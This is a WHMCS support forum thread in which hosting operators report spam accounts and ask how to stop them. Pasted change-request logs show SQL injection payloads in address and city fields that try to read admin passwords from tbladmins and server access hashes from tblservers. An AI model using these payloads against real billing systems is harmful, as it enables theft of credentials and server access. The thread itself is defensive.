Spam Account Keeps Registering

WHMCS John · February 16, 2015

Hi,

Please refer to existing threads from other users reporting the same: http://forum.whmcs.com/showthread.php?97562

keneso · April 7, 2015

Hi,

is there a way to stop this kind of attacks?

===================

Client ID: 2 - Dedemit ID has requested to change his/her details as indicated below:

Address 1: 'JL SYNTAX ERROR' to 'syntaxerror'
Address 2: 'JL SYNTAX ERROR' to 'syntaxerror'
City: 'd3d3' to 'AES_ENCRYPT(1,1), city= (SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins)'
Postcode: '404403' to '102030'
Default Payment Method: '' to ''
How Did You Hear About Us?: 'Google' to ''
If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

This change request was submitted from srv84.prodns.com.br (192.185.176.231)

Thank you

Infopro · April 7, 2015

http://forums.whmcs.com/showthread.php?93239-Spam-Account-Keeps-Registering&highlight=AES_ENCRYPT

Thanks.

keneso · April 8, 2015

Thank you.

Read thru all of it, and decided to block all changes by registered user, will see in the next days.

iPlex · May 20, 2015

I am not even sure if this in the right section but I am going to put it here.

A couple hours ago I got an a person trying to register a domain the didn't (my settings are they they have to pay before the domain registration is sent to the registrar) and the info they gave was:

First Name	Cpanel
Last Name	Exploiter
Company Name	CpanelExp
Email Address	[email]wafer@mail.com[/email]
Address 1	hacked
Address 2	hacked
City	hacked
State/Region	hacked
Postcode	93125
Country	US - United States
Phone Number	850040404

and then they changed info to that looked like they were trying to injected PHP or MySQL code....

Address 1: 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)' to 'AES_ENCRYPT(1,1), address1= (SELECT MAX(type) FROM tblservers)'
Address 2: 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)' to 'AES_ENCRYPT(1,1), address2= (SELECT MAX(ipaddress) FROM tblservers)'
City: 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)' to 'AES_ENCRYPT(1,1), city= (SELECT MAX(username) FROM tblservers)'
State: 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)' to 'AES_ENCRYPT(1,1), state= (SELECT MAX(accesshash) FROM tblservers)'
Default Payment Method: '' to ''

They changed it several times the above is just one of them.... to the best I can see non of the Sites I have have been defaced and the my Server has not gotten a root log in since January (which was me).

Should I be worried?

Any help is NEEDED, and appreciated

Edited May 20, 2015 by Infopro
Changed Title

Infopro · May 20, 2015

I am not even sure if this in the right section but I am going to put it here.

...

Moved to existing, closed thread with details for you.

Sign In

Spam Account Keeps Registering

Recommended Posts

WHMCS John

Link to comment

Share on other sites

Top Posters In This Topic

Popular Days

Top Posters In This Topic

Popular Days

Posted Images

keneso

Link to comment

Share on other sites

Infopro

Link to comment

Share on other sites

keneso

Link to comment

Share on other sites

iPlex

Link to comment

Share on other sites

Infopro

Link to comment

Share on other sites

Similar Content

hacking Mass Bogus New Account Creation

Making SQL Injection attacks harder for hackers

WHMCS Community Involved - Additional Security Suggestions

Email Validation for register.php and cart.php are allowing false email addresses!

I getting targeted by 0-day can and need advice.

Recently Browsing 0 members

Browse

Latest Activity

Blog

Technical Support

Important Information